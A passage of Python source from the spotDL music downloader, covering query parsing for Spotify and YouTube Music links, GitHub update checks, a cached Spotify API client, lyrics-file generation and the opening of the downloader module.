"65329": 81, "65330": 82, "65333": 85, "65334": 86, "65335": 87, "65343": 95, "65346": 98, "65348": 100, "65350": 102, "65355": 107, "65357": 109, "65358": 110, "65361": 113, "65362": 114, "65364": 116, "65365": 117, "65367": 119, "65370": 122, "65371": 123, "65373": 125, "160": 32, "8211": 45, "65374": 126, "65306": 58, "65281": 33, "8216": 96, "8217": 
96, "8245": 96, "180": 96, "12494": 47, "1047": 51, "1073": 54, "1072": 97, "1040": 65, "1068": 98, "1042": 66, "1089": 99, "1057": 67, "1077": 101, "1045": 69, "1053": 72, "305": 105, "1050": 75, "921": 73, "1052": 77, "1086": 111, "1054": 79, "1009": 112, "1088": 112, "1056": 80, "1075": 114, "1058": 84, "215": 120, "1093": 120, "1061": 88, "1091": 121, "1059": 89, "65283": 35, "65288": 40, "65289": 41, "65292": 44, "65307": 59, "65311": 63, } File: spotdl/utils/archive.py """ Module for archiving sets of data """ from pathlib import Path from typing import Set __all__ = ["Archive"] class Archive(Set): """ Archive class. A file-persistable set. """ def load(self, file: str) -> bool: """ Imports the archive from the file. ### Arguments - file: the file name of the archive ### Returns - if the file exists """ if not Path(file).exists(): return False with open(file, "r", encoding="utf-8") as archive: self.clear() self.update([line.strip() for line in archive]) return True def save(self, file: str) -> bool: """ Exports the current archive to the file. ### Arguments - file: the file name of the archive """ with open(file, "w", encoding="utf-8") as archive: for element in sorted(self): archive.write(f"{element}\n") return True File: spotdl/utils/search.py """ Module for creating Song objects by interacting with Spotify API or by parsing a query. To use this module you must first initialize the SpotifyClient. """ import concurrent.futures import json import logging import re from pathlib import Path from typing import Dict, List, Optional import requests from ytmusicapi import YTMusic from spotdl.types.album import Album from spotdl.types.artist import Artist from spotdl.types.playlist import Playlist from spotdl.types.saved import Saved from spotdl.types.song import Song, SongList from spotdl.utils.metadata import get_file_metadata from spotdl.utils.spotify import SpotifyClient, SpotifyError __all__ = [ "QueryError", "get_search_results", "parse_query", "get_simple_songs", "reinit_song", "get_song_from_file_metadata", "gather_known_songs", "create_ytm_album", "create_ytm_playlist", "get_all_user_playlists", "get_user_saved_albums", ] logger = logging.getLogger(__name__) client = None # pylint: disable=invalid-name def get_ytm_client() -> YTMusic: """ Lazily initialize the YTMusic client. ### Returns - the YTMusic client """ global client # pylint: disable=global-statement if client is None: client = YTMusic() return client class QueryError(Exception): """ Base class for all exceptions related to query. """ def get_search_results(search_term: str) -> List[Song]: """ Creates a list of Song objects from a search term. 
### Arguments - search_term: the search term to use ### Returns - a list of Song objects """ return Song.list_from_search_term(search_term) def parse_query( query: List[str], threads: int = 1, use_ytm_data: bool = False, playlist_numbering: bool = False, album_type=None, ) -> List[Song]: """ Parse query and return list containing song object ### Arguments - query: List of strings containing query - threads: Number of threads to use ### Returns - List of song objects """ songs: List[Song] = get_simple_songs( query, use_ytm_data=use_ytm_data, playlist_numbering=playlist_numbering, album_type=album_type, ) results = [] with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor: future_to_song = {executor.submit(reinit_song, song): song for song in songs} for future in concurrent.futures.as_completed(future_to_song): song = future_to_song[future] try: results.append(future.result()) except Exception as exc: logger.error("%s generated an exception: %s", song.display_name, exc) return results def get_simple_songs( query: List[str], use_ytm_data: bool = False, playlist_numbering: bool = False, albums_to_ignore=None, album_type=None, ) -> List[Song]: """ Parse query and return list containing simple song objects ### Arguments - query: List of strings containing query ### Returns - List of simple song objects """ songs: List[Song] = [] lists: List[SongList] = [] for request in query: logger.info("Processing query: %s", request) # Remove /intl-xxx/ from Spotify URLs with regex request = re.sub(r"\/intl-\w+\/", "/", request) if ( ( # pylint: disable=too-many-boolean-expressions "watch?v=" in request or "youtu.be/" in request or "soundcloud.com/" in request or "bandcamp.com/" in request ) and "open.spotify.com" in request and "track" in request and "|" in request ): split_urls = request.split("|") if ( len(split_urls) <= 1 or not ( "watch?v=" in split_urls[0] or "youtu.be" in split_urls[0] or "soundcloud.com/" in split_urls[0] or "bandcamp.com/" in split_urls[0] ) or "spotify" not in split_urls[1] ): raise QueryError( 'Incorrect format used, please use "YouTubeURL|SpotifyURL"' ) songs.append( Song.from_missing_data(url=split_urls[1], download_url=split_urls[0]) ) elif "music.youtube.com/watch?v" in request: track_data = get_ytm_client().get_song(request.split("?v=", 1)[1]) yt_song = Song.from_search_term( f"{track_data['videoDetails']['author']} - {track_data['videoDetails']['title']}" ) if use_ytm_data: yt_song.name = track_data["title"] yt_song.artist = track_data["author"] yt_song.artists = [track_data["author"]] yt_song.duration = track_data["lengthSeconds"] yt_song.download_url = request songs.append(yt_song) elif ( "youtube.com/playlist?list=" in request or "youtube.com/browse/VLPL" in request ): request = request.replace( "https://www.youtube.com/", "https://music.youtube.com/" ) request = request.replace( "https://youtube.com/", "https://music.youtube.com/" ) split_urls = request.split("|") if len(split_urls) == 1: if "?list=OLAK5uy_" in request: lists.append(create_ytm_album(request, fetch_songs=False)) elif "?list=PL" in request or "browse/VLPL" in request: lists.append(create_ytm_playlist(request, fetch_songs=False)) else: if ("spotify" not in split_urls[1]) or not any( x in split_urls[0] for x in ["?list=PL", "?list=OLAK5uy_", "browse/VLPL"] ): raise QueryError( 'Incorrect format used, please use "YouTubeMusicURL|SpotifyURL". ' "Currently only supports YouTube Music playlists and albums." 
) if ("open.spotify.com" in request and "album" in request) and ( "?list=OLAK5uy_" in request ): ytm_list: SongList = create_ytm_album( split_urls[0], fetch_songs=False ) spot_list = Album.from_url(split_urls[1], fetch_songs=False) elif ("open.spotify.com" in request and "playlist" in request) and ( "?list=PL" in request or "browse/VLPL" in request ): ytm_list = create_ytm_playlist(split_urls[0], fetch_songs=False) spot_list = Playlist.from_url(split_urls[1], fetch_songs=False) else: raise QueryError( f"URLs are not of the same type, {split_urls[0]} is not " f"the same type as {split_urls[1]}." ) if ytm_list.length != spot_list.length: raise QueryError( f"The YouTube Music ({ytm_list.length}) " f"and Spotify ({spot_list.length}) lists have different lengths. " ) if use_ytm_data: for index, song in enumerate(ytm_list.songs): song.url = spot_list.songs[index].url lists.append(ytm_list) else: for index, song in enumerate(spot_list.songs): song.download_url = ytm_list.songs[index].download_url lists.append(spot_list) elif "open.spotify.com" in request and "track" in request: songs.append(Song.from_url(url=request)) elif "https://spotify.link/" in request: resp = requests.head(request, allow_redirects=True, timeout=10) full_url = resp.url full_lists = get_simple_songs( [full_url], use_ytm_data=use_ytm_data, playlist_numbering=playlist_numbering, album_type=album_type, ) songs.extend(full_lists) elif "open.spotify.com" in request and "playlist" in request: lists.append(Playlist.from_url(request, fetch_songs=False)) elif "open.spotify.com" in request and "album" in request: lists.append(Album.from_url(request, fetch_songs=False)) elif "open.spotify.com" in request and "artist" in request: lists.append(Artist.from_url(request, fetch_songs=False)) elif "open.spotify.com" in request and "user" in request: lists.extend(get_all_user_playlists(request)) elif "album:" in request: lists.append(Album.from_search_term(request, fetch_songs=False)) elif "playlist:" in request: lists.append(Playlist.from_search_term(request, fetch_songs=False)) elif "artist:" in request: lists.append(Artist.from_search_term(request, fetch_songs=False)) elif request == "saved": lists.append(Saved.from_url(request, fetch_songs=False)) elif request == "all-user-playlists": lists.extend(get_all_user_playlists()) elif request == "all-user-followed-artists": lists.extend(get_user_followed_artists()) elif request == "all-user-saved-albums": lists.extend(get_user_saved_albums()) elif request == "all-saved-playlists": lists.extend(get_all_saved_playlists()) elif request.endswith(".spotdl"): with open(request, "r", encoding="utf-8") as save_file: for track in json.load(save_file): # Append to songs songs.append(Song.from_dict(track)) else: songs.append(Song.from_search_term(request)) for song_list in lists: logger.info( "Found %s songs in %s (%s)", len(song_list.urls), song_list.name, song_list.__class__.__name__, ) for index, song in enumerate(song_list.songs): song_data = song.json song_data["list_name"] = song_list.name song_data["list_url"] = song_list.url song_data["list_position"] = song.list_position song_data["list_length"] = song_list.length if playlist_numbering: song_data["track_number"] = song_data["list_position"] song_data["tracks_count"] = song_data["list_length"] song_data["album_name"] = song_data["list_name"] song_data["disc_number"] = 1 song_data["disc_count"] = 1 if isinstance(song_list, Playlist): song_data["album_artist"] = song_list.author_name song_data["cover_url"] = song_list.cover_url 
songs.append(Song.from_dict(song_data)) # removing songs for --ignore-albums original_length = len(songs) if albums_to_ignore: songs = [ song for song in songs if all( keyword not in song.album_name.lower() for keyword in albums_to_ignore ) ] logger.info("Skipped %s songs (Ignored albums)", (original_length - len(songs))) if album_type: songs = [song for song in songs if song.album_type == album_type] logger.info( "Skipped %s songs for Album Type %s", (original_length - len(songs)), album_type, ) logger.debug("Found %s songs in %s lists", len(songs), len(lists)) return songs def songs_from_albums(albums: List[str]): """ Get all songs from albums ids/urls/etc. ### Arguments - albums: List of albums ids ### Returns - List of songs """ songs: List[Song] = [] for album_id in albums: album = Album.from_url(album_id, fetch_songs=False) songs.extend([Song.from_missing_data(**song.json) for song in album.songs]) return songs def get_all_user_playlists(user_url: str = "") -> List[Playlist]: """ Get all user playlists. ### Args (optional) - user_url: Spotify user profile url. If a url is mentioned, get all public playlists of that specific user. ### Returns - List of all user playlists """ spotify_client = SpotifyClient() if spotify_client.user_auth is False: # type: ignore raise SpotifyError("You must be logged in to use this function") if user_url and not user_url.startswith("https://open.spotify.com/user/"): raise ValueError(f"Invalid user profile url: {user_url}") user_id = user_url.split("https://open.spotify.com/user/")[-1].replace("/", "") if user_id: user_playlists_response = spotify_client.user_playlists(user_id) else: user_playlists_response = spotify_client.current_user_playlists() user_resp = spotify_client.current_user() if user_resp is None: raise SpotifyError("Couldn't get user info") user_id = user_resp["id"] if user_playlists_response is None: raise SpotifyError("Couldn't get user playlists") user_playlists = user_playlists_response["items"] # Fetch all saved tracks while user_playlists_response and user_playlists_response["next"]: response = spotify_client.next(user_playlists_response) if response is None: break user_playlists_response = response user_playlists.extend(user_playlists_response["items"]) return [ Playlist.from_url(playlist["external_urls"]["spotify"], fetch_songs=False) for playlist in user_playlists if playlist["owner"]["id"] == user_id ] def get_user_saved_albums() -> List[Album]: """ Get all user saved albums ### Returns - List of all user saved albums """ spotify_client = SpotifyClient() if spotify_client.user_auth is False: # type: ignore raise SpotifyError("You must be logged in to use this function") user_saved_albums_response = spotify_client.current_user_saved_albums() if user_saved_albums_response is None: raise SpotifyError("Couldn't get user saved albums") user_saved_albums = user_saved_albums_response["items"] # Fetch all saved tracks while user_saved_albums_response and user_saved_albums_response["next"]: response = spotify_client.next(user_saved_albums_response) if response is None: break user_saved_albums_response = response user_saved_albums.extend(user_saved_albums_response["items"]) return [ Album.from_url(item["album"]["external_urls"]["spotify"], fetch_songs=False) for item in user_saved_albums ] def get_user_followed_artists() -> List[Artist]: """ Get all user playlists ### Returns - List of all user playlists """ spotify_client = SpotifyClient() if spotify_client.user_auth is False: # type: ignore raise SpotifyError("You must be logged in to use 
this function") user_followed_response = spotify_client.current_user_followed_artists() if user_followed_response is None: raise SpotifyError("Couldn't get user followed artists") user_followed_response = user_followed_response["artists"] user_followed = user_followed_response["items"] # Fetch all artists while user_followed_response and user_followed_response["next"]: response = spotify_client.next(user_followed_response) if response is None: break user_followed_response = response["artists"] user_followed.extend(user_followed_response["items"]) return [ Artist.from_url(followed_artist["external_urls"]["spotify"], fetch_songs=False) for followed_artist in user_followed ] def get_all_saved_playlists() -> List[Playlist]: """ Get all user playlists. ### Args (optional) - user_url: Spotify user profile url. If a url is mentioned, get all public playlists of that specific user. ### Returns - List of all user playlists """ spotify_client = SpotifyClient() if spotify_client.user_auth is False: # type: ignore raise SpotifyError("You must be logged in to use this function") user_playlists_response = spotify_client.current_user_playlists() if user_playlists_response is None: raise SpotifyError("Couldn't get user playlists") user_playlists = user_playlists_response["items"] user_id = user_playlists_response["href"].split("users/")[-1].split("/")[0] # Fetch all saved tracks while user_playlists_response and user_playlists_response["next"]: response = spotify_client.next(user_playlists_response) if response is None: break user_playlists_response = response user_playlists.extend(user_playlists_response["items"]) return [ Playlist.from_url(playlist["external_urls"]["spotify"], fetch_songs=False) for playlist in user_playlists if playlist["owner"]["id"] != user_id ] def reinit_song(song: Song) -> Song: """ Update song object with new data from Spotify ### Arguments - song: Song object ### Returns - Updated song object """ data = song.json if data.get("url"): new_data = Song.from_url(data["url"]).json elif data.get("song_id"): new_data = Song.from_url( "https://open.spotify.com/track/" + data["song_id"] ).json elif data.get("name") and data.get("artist"): new_data = Song.from_search_term(f"{data['artist']} - {data['name']}").json else: raise QueryError("Song object is missing required data to be reinitialized") for key in Song.__dataclass_fields__: # type: ignore # pylint: disable=E1101 val = data.get(key) new_val = new_data.get(key) if new_val is not None and val is None: data[key] = new_val elif new_val is not None and val is not None: data[key] = val # return reinitialized song object return Song(**data) def get_song_from_file_metadata(file: Path, id3_separator: str = "/") -> Optional[Song]: """ Get song based on the file metadata or file name ### Arguments - file: Path to file ### Returns - Song object """ file_metadata = get_file_metadata(file, id3_separator) if file_metadata is None: return None return Song.from_missing_data(**file_metadata) def gather_known_songs(output: str, output_format: str) -> Dict[str, List[Path]]: """ Gather all known songs from the output directory ### Arguments - output: Output path template - output_format: Output format ### Returns - Dictionary containing all known songs and their paths """ # Get the base directory from the path template # Path("/Music/test/{artist}/{artists} - {title}.{output-ext}") -> "/Music/test" base_dir = output.split("{", 1)[0] paths = Path(base_dir).glob(f"**/*.{output_format}") known_songs: Dict[str, List[Path]] = {} for path in paths: # Try to 
get the song from the metadata song = get_song_from_file_metadata(path) # If the songs doesn't have metadata, try to get it from the filename if song is None or song.url is None: search_results = get_search_results(path.stem) if len(search_results) == 0: continue song = search_results[0] known_paths = known_songs.get(song.url) if known_paths is None: known_songs[song.url] = [path] else: known_songs[song.url].append(path) return known_songs def create_ytm_album(url: str, fetch_songs: bool = True) -> Album: """ Creates a list of Song objects from an album query. ### Arguments - album_query: the url of the album ### Returns - a list of Song objects """ if "?list=" not in url or not url.startswith("https://music.youtube.com/"): raise ValueError(f"Invalid album url: {url}") browse_id = get_ytm_client().get_album_browse_id( url.split("?list=")[1].split("&")[0] ) if browse_id is None: raise ValueError(f"Invalid album url: {url}") album = get_ytm_client().get_album(browse_id) if album is None: raise ValueError(f"Couldn't fetch album: {url}") metadata = { "artist": album["artists"][0]["name"], "name": album["title"], "url": url, } songs = [] for track in album["tracks"]: artists = [artist["name"] for artist in track["artists"]] song = Song.from_missing_data( name=track["title"], artists=artists, artist=artists[0], album_name=metadata["name"], album_artist=metadata["artist"], duration=track["duration_seconds"], download_url=f"https://music.youtube.com/watch?v={track['videoId']}", ) if fetch_songs: song = Song.from_search_term(f"{song.artist} - {song.name}") songs.append(song) return Album(**metadata, songs=songs, urls=[song.url for song in songs]) def create_ytm_playlist(url: str, fetch_songs: bool = True) -> Playlist: """ Returns a playlist object from a youtube playlist url ### Arguments - url: the url of the playlist ### Returns - a Playlist object """ if not ("?list=" in url or "/browse/VLPL" in url) or not url.startswith( "https://music.youtube.com/" ): raise ValueError(f"Invalid playlist url: {url}") if "/browse/VLPL" in url: playlist_id = url.split("/browse/")[1] else: playlist_id = url.split("?list=")[1] playlist = get_ytm_client().get_playlist(playlist_id, None) # type: ignore if playlist is None: raise ValueError(f"Couldn't fetch playlist: {url}") metadata = { "description": ( playlist["description"] if playlist["description"] is not None else "" ), "author_url": ( f"https://music.youtube.com/channel/{playlist['author']['id']}" if playlist.get("author") is not None else "Missing author url" ), "author_name": ( playlist["author"]["name"] if playlist.get("author") is not None else "Missing author" ), "cover_url": ( playlist["thumbnails"][0]["url"] if playlist.get("thumbnails") is not None else "Missing thumbnails" ), "name": playlist["title"], "url": url, } songs = [] for track in playlist["tracks"]: if track["videoId"] is None or track["isAvailable"] is False: continue song = Song.from_missing_data( name=track["title"], artists=( [artist["name"] for artist in track["artists"]] if track.get("artists") is not None else [] ), artist=( track["artists"][0]["name"] if track.get("artists") is not None else None ), album_name=( track.get("album", {}).get("name") if track.get("album") is not None else None ), duration=track.get("duration_seconds"), explicit=track.get("isExplicit"), download_url=f"https://music.youtube.com/watch?v={track['videoId']}", ) if fetch_songs: song = reinit_song(song) songs.append(song) return Playlist(**metadata, songs=songs, urls=[song.url for song in songs]) File: 
spotdl/utils/github.py """ Module for getting information about the current version of spotdl from GitHub, downloading the latest version, and checking for updates. """ import logging import os import re from typing import Tuple import requests from spotdl import _version __all__ = [ "REPO", "WEB_APP_URL", "get_status", "check_for_updates", "get_latest_version", "create_github_url", "download_github_dir", ] REPO = "spotdl/spotify-downloader" WEB_APP_URL = "https://github.com/spotdl/web-ui/tree/master/dist" class RateLimitError(Exception): """ Raised when the GitHub API rate limit is exceeded. """ def get_status(start: str, end: str, repo: str = REPO) -> Tuple[str, int, int]: """ Get the status of a commit range. ### Arguments - start: the starting commit/branch/tag - end: the ending commit/branch/tag - repo: the repo to check (defaults to spotdl/spotify-downloader) ### Returns - tuple of (status, ahead_by, behind_by) """ url = f"https://api.github.com/repos/{repo}/compare/{start}...{end}" response = requests.get(url, timeout=10) if response.status_code != 200: if response.status_code == 403: raise RateLimitError("GitHub API rate limit exceeded.") raise RuntimeError( f"Failed to get commit count. Status code: {response.status_code}" ) data = response.json() return ( data["status"], data["ahead_by"], data["behind_by"], ) def get_latest_version(repo: str = REPO) -> str: """ Get the latest version of spotdl. ### Arguments - repo: the repo to check (defaults to spotdl/spotify-downloader) ### Returns - the latest version """ url = f"https://api.github.com/repos/{repo}/releases/latest" response = requests.get(url, timeout=10) if response.status_code != 200: if response.status_code == 403: raise RateLimitError("GitHub API rate limit exceeded.") raise RuntimeError( f"Failed to get commit count. Status code: {response.status_code}" ) data = response.json() return data["name"] # returns "vx.x.x" def check_for_updates(repo: str = REPO) -> str: """ Check for updates to the current version. ### Arguments - repo: the repo to check (defaults to spotdl/spotify-downloader) ### Returns - the latest version """ message = "" latest_version = get_latest_version(repo) current_version = f"v{_version.__version__}" # returns "vx.x.x" if latest_version != current_version: message = f"New version available: {latest_version}.\n\n" else: message = "No updates available.\n\n" try: master = get_status(current_version, "master") dev = get_status(current_version, "dev") except RuntimeError: message = "Couldn't check for updates. You might be running a dev version.\n" message += "Current version: " + current_version + "\n" message += "Latest version: " + latest_version return message except RateLimitError: message = "GitHub API rate limit exceeded. Couldn't check for updates.\n" message += "Current version: " + current_version + "\n" message += "Latest version: " + latest_version + "\n" message += "Please try again later." return message for branch in ["master", "dev"]: name = branch.capitalize() if branch == "master": status, ahead_by, behind_by = master else: status, ahead_by, behind_by = dev if status == "behind": message += f"{name} is {status} by {behind_by} commits.\n" elif status == "ahead": message += f"{name} is {status} by {ahead_by} commits.\n" else: message += f"{name} is up to date.\n" return message def create_github_url(url: str = WEB_APP_URL): """ From the given url, produce a URL that is compatible with Github's REST API. ### Arguments - url: the url to convert ### Notes - Can handle blob or tree paths. 
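
    ### Example
    - The default `WEB_APP_URL` (`https://github.com/spotdl/web-ui/tree/master/dist`)
      should roughly be rewritten to
      `https://api.github.com/repos/spotdl/web-ui/contents/dist?ref=master`.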
""" repo_only_url = re.compile( r"https:\/\/github\.com\/[a-z\d](?:[a-z\d]|-(?=[a-z\d])){0,38}\/[a-zA-Z0-9]+$" ) re_branch = re.compile("/(tree|blob)/(.+?)/") # Check if the given url is a url to a GitHub repo. If it is, tell the # user to use 'git clone' to download it if re.match(repo_only_url, url): raise ValueError( "The given URL is a GitHub repo. Please use 'git clone' to download it." ) # extract the branch name from the given url (e.g master) branch = re_branch.search(url) if branch: download_dirs = url[branch.end() :] api_url = ( url[: branch.start()].replace("github.com", "api.github.com/repos", 1) + "/contents/" + download_dirs + "?ref=" + branch.group(2) ) return api_url raise ValueError("The given url is not a valid GitHub url") def download_github_dir( repo_url: str = WEB_APP_URL, flatten: bool = False, output_dir: str = "./" ): """ Downloads the files and directories in repo_url. ### Arguments - repo_url: the url to the repo to download - flatten: whether to flatten the directory structure - output_dir: the directory to download the files to ### Notes - Modification of https://github.com/sdushantha/gitdir/blob/master/gitdir/gitdir.py """ # generate the url which returns the JSON data api_url = create_github_url(repo_url) dir_out = output_dir response = requests.get(api_url, timeout=10).json() if ( isinstance(response, dict) and "message" in response.keys() and "rate limit" in response["message"] ): logging.error( "You have been rate limited by Github API attempting to update web client." "Proceeding with cached web client. Please try again later." "See https://docs.github.com/en/rest/overview/resources-in-the-rest-api#rate-limiting" ) return None if not flatten: # make a directory with the name which is taken from # the actual repo os.makedirs(dir_out, exist_ok=True) if isinstance(response, dict) and response["type"] == "file": response = [response] for file in response: file_url = file["download_url"] if flatten: path = os.path.join(dir_out, os.path.basename(file["path"])) else: path = os.path.join(dir_out, file["path"]) dirname = os.path.dirname(path) if dirname != "": os.makedirs(dirname, exist_ok=True) if file_url is not None: with open(path, "wb") as new_file: new_file.write(requests.get(file_url, timeout=10).content) else: download_github_dir(file["html_url"], flatten, output_dir) return None File: spotdl/utils/spotify.py """ Module for interacting with Spotify API. To use this module, you must have a Spotify API key and Spotify API secret. ```python import spotdl.utils.spotify spotify.Spotify.init(client_id, client_secret) ``` """ import json import logging from typing import Dict, Optional import requests from spotipy import Spotify from spotipy.cache_handler import CacheFileHandler, MemoryCacheHandler from spotipy.oauth2 import SpotifyClientCredentials, SpotifyOAuth from spotdl.utils.config import get_cache_path, get_spotify_cache_path __all__ = [ "SpotifyError", "SpotifyClient", "save_spotify_cache", ] logger = logging.getLogger(__name__) class SpotifyError(Exception): """ Base class for all exceptions related to SpotifyClient. """ class Singleton(type): """ Singleton metaclass for SpotifyClient. Ensures that SpotifyClient is not instantiated without prior initialization. Every other instantiation of SpotifyClient will return the same instance. """ _instance = None def __call__(self): # pylint: disable=bad-mcs-method-argument """ Call method for Singleton metaclass. ### Returns - The instance of the SpotifyClient. 
""" if self._instance is None: raise SpotifyError( "Spotify client not created. Call SpotifyClient.init" "(client_id, client_secret, user_auth, cache_path, no_cache, open_browser) first." ) return self._instance def init( # pylint: disable=bad-mcs-method-argument self, client_id: str, client_secret: str, user_auth: bool = False, no_cache: bool = False, headless: bool = False, max_retries: int = 3, use_cache_file: bool = False, auth_token: Optional[str] = None, cache_path: Optional[str] = None, ) -> "Singleton": """ Initializes the SpotifyClient. ### Arguments - client_id: The client ID of the application. - client_secret: The client secret of the application. - auth_token: The access token to use. - user_auth: Whether or not to use user authentication. - cache_path: The path to the cache file. - no_cache: Whether or not to use the cache. - open_browser: Whether or not to open the browser. ### Returns - The instance of the SpotifyClient. """ # check if initialization has been completed, if yes, raise an Exception if isinstance(self._instance, self): raise SpotifyError("A spotify client has already been initialized") credential_manager = None cache_handler = ( CacheFileHandler(cache_path or get_cache_path()) if not no_cache else MemoryCacheHandler() ) # Use SpotifyOAuth as auth manager if user_auth: credential_manager = SpotifyOAuth( client_id=client_id, client_secret=client_secret, redirect_uri="http://127.0.0.1:9900/", scope="user-library-read,user-follow-read,playlist-read-private", cache_handler=cache_handler, open_browser=not headless, ) # Use SpotifyClientCredentials as auth manager else: credential_manager = SpotifyClientCredentials( client_id=client_id, client_secret=client_secret, cache_handler=cache_handler, ) if auth_token is not None: credential_manager = None self.user_auth = user_auth self.no_cache = no_cache self.max_retries = max_retries self.use_cache_file = use_cache_file # Create instance self._instance = super().__call__( auth=auth_token, auth_manager=credential_manager, status_forcelist=(429, 500, 502, 503, 504, 404), ) # Return instance return self._instance class SpotifyClient(Spotify, metaclass=Singleton): """ This is the Spotify client meant to be used in the app. Has to be initialized first by calling `SpotifyClient.init(client_id, client_secret, user_auth, cache_path, no_cache, open_browser)`. """ _initialized = False cache: Dict[str, Optional[Dict]] = {} def __init__(self, *args, **kwargs): """ Initializes the SpotifyClient. ### Arguments - auth: The access token to use. - auth_manager: The auth manager to use. """ super().__init__(*args, **kwargs) self._initialized = True use_cache_file: bool = self.use_cache_file # type: ignore # pylint: disable=E1101 cache_file_loc = get_spotify_cache_path() if use_cache_file and cache_file_loc.exists(): with open(cache_file_loc, "r", encoding="utf-8") as cache_file: self.cache = json.load(cache_file) elif use_cache_file: with open(cache_file_loc, "w", encoding="utf-8") as cache_file: json.dump(self.cache, cache_file) def _get(self, url, args=None, payload=None, **kwargs): """ Overrides the get method of the SpotifyClient. 
Allows us to cache requests """ use_cache = not self.no_cache # type: ignore # pylint: disable=E1101 if args: kwargs.update(args) cache_key = None if use_cache: key_obj = dict(kwargs) key_obj["url"] = url key_obj["data"] = json.dumps(payload) cache_key = json.dumps(key_obj) if cache_key is None: cache_key = url if self.cache.get(cache_key) is not None: return self.cache[cache_key] # Wrap in a try-except and retry up to `retries` times. response = None retries = self.max_retries # type: ignore # pylint: disable=E1101 while response is None: try: response = self._internal_call("GET", url, payload, kwargs) except (requests.exceptions.Timeout, requests.ConnectionError) as exc: retries -= 1 if retries <= 0: raise exc if use_cache and cache_key is not None: self.cache[cache_key] = response return response def save_spotify_cache(cache: Dict[str, Optional[Dict]]): """ Saves the Spotify cache to a file. ### Arguments - cache: The cache to save. """ cache_file_loc = get_spotify_cache_path() logger.debug("Saving Spotify cache to %s", cache_file_loc) # Only cache tracks cache = { key: value for key, value in cache.items() if value is not None and "tracks/" in key } with open(cache_file_loc, "w", encoding="utf-8") as cache_file: json.dump(cache, cache_file) File: spotdl/utils/lrc.py """ LRC related functions """ import logging import re from pathlib import Path from syncedlyrics import search as syncedlyrics_search from syncedlyrics.utils import Lyrics, TargetType, has_translation from spotdl.types.song import Song logger = logging.getLogger(__name__) __all__ = ["generate_lrc", "remomve_lrc"] def generate_lrc(song: Song, output_file: Path): """ Generates an LRC file for the current song ### Arguments - song: Song object - output_file: Path to the output file """ if song.lyrics and has_translation(song.lyrics): lrc_data = song.lyrics else: try: lrc_data = syncedlyrics_search(song.display_name) except Exception: lrc_data = None if lrc_data: Lyrics(lrc_data).save_lrc_file( str(output_file.with_suffix(".lrc")), TargetType.PREFER_SYNCED ) logger.debug("Saved lrc file for %s", song.display_name) else: logger.debug("No lrc file found for %s", song.display_name) def remomve_lrc(lyrics: str) -> str: """ Removes lrc tags from lyrics ### Arguments - lyrics: Lyrics string ### Returns - Lyrics string without lrc tags """ return re.sub(r"\[.*?\]", "", lyrics) File: spotdl/download/downloader.py """ Downloader module, this is where all the downloading pre/post processing happens etc. 
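
A rough usage sketch (the settings keys follow `DownloaderOptions`, the values and
the search term are placeholders, and an already initialized `SpotifyClient` plus a
working ffmpeg are assumed):

```python
from spotdl.download.downloader import Downloader
from spotdl.types.song import Song

downloader = Downloader(settings={"format": "mp3", "threads": 2})
song = Song.from_search_term("artist - title")  # placeholder query
song, path = downloader.download_song(song)     # path is None if the download failed
downloader.progress_handler.close()
```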
""" import asyncio import datetime import json import logging import re import shutil import sys import traceback from argparse import Namespace from pathlib import Path from typing import Dict, List, Optional, Tuple, Type, Union from yt_dlp.postprocessor.modify_chapters import ModifyChaptersPP from yt_dlp.postprocessor.sponsorblock import SponsorBlockPP from spotdl.download.progress_handler import ProgressHandler from spotdl.providers.audio import ( AudioProvider, BandCamp, Piped, SliderKZ, SoundCloud, YouTube, YouTubeMusic, ) from spotdl.providers.lyrics import AzLyrics, Genius, LyricsProvider, MusixMatch, Synced from spotdl.types.options import DownloaderOptionalOptions, DownloaderOptions from spotdl.types.song import Song from spotdl.utils.archive import Archive from spotdl.utils.config import ( DOWNLOADER_OPTIONS, GlobalConfig, create_settings_type, get_errors_path, get_temp_path, modernize_settings, ) from spotdl.utils.ffmpeg import FFmpegError, convert, get_ffmpeg_path from spotdl.utils.formatter import create_file_name from spotdl.utils.lrc import generate_lrc from spotdl.utils.m3u import gen_m3u_files from spotdl.utils.metadata import MetadataError, embed_metadata from spotdl.utils.search import gather_known_songs, reinit_song, songs_from_albums __all__ = [ "AUDIO_PROVIDERS", "LYRICS_PROVIDERS", "Downloader", "DownloaderError", "SPONSOR_BLOCK_CATEGORIES", ] AUDIO_PROVIDERS: Dict[str, Type[AudioProvider]] = { "youtube": YouTube, "youtube-music": YouTubeMusic, "slider-kz": SliderKZ, "soundcloud": SoundCloud, "bandcamp": BandCamp, "piped": Piped, } LYRICS_PROVIDERS: Dict[str, Type[LyricsProvider]] = { "genius": Genius, "musixmatch": MusixMatch, "azlyrics": AzLyrics, "synced": Synced, } SPONSOR_BLOCK_CATEGORIES = { "sponsor": "Sponsor", "intro": "Intermission/Intro Animation", "outro": "Endcards/Credits", "selfpromo": "Unpaid/Self Promotion", "preview": "Preview/Recap", "filler": "Filler Tangent", "interaction": "Interaction Reminder", "music_offtopic": "Non-Music Section", } logger = logging.getLogger(__name__) class DownloaderError(Exception): """ Base class for all exceptions related to downloaders. """ class Downloader: """ Downloader class, this is where all the downloading pre/post processing happens etc. It handles the downloading/moving songs, multithreading, metadata embedding etc. """ def __init__( self, settings: Optional[Union[DownloaderOptionalOptions, DownloaderOptions]] = None, loop: Optional[asyncio.AbstractEventLoop] = None, ): """ Initialize the Downloader class. ### Arguments - settings: The settings to use. - loop: The event loop to use. ### Notes - `search-query` uses the same format as `output`. - if `audio_provider` or `lyrics_provider` is a list, then if no match is found, the next provider in the list will be used. """ if settings is None: settings = {} # Create settings dictionary, fill in missing values with defaults # from spotdl.types.options.DOWNLOADER_OPTIONS self.settings: DownloaderOptions = DownloaderOptions( **create_settings_type( Namespace(config=False), dict(settings), DOWNLOADER_OPTIONS ) # type: ignore ) # Handle deprecated values in config file modernize_settings(self.settings) logger.debug("Downloader settings: %s", self.settings) # If no audio providers specified, raise an error if len(self.settings["audio_providers"]) == 0: raise DownloaderError( "No audio providers specified. Please specify at least one." 
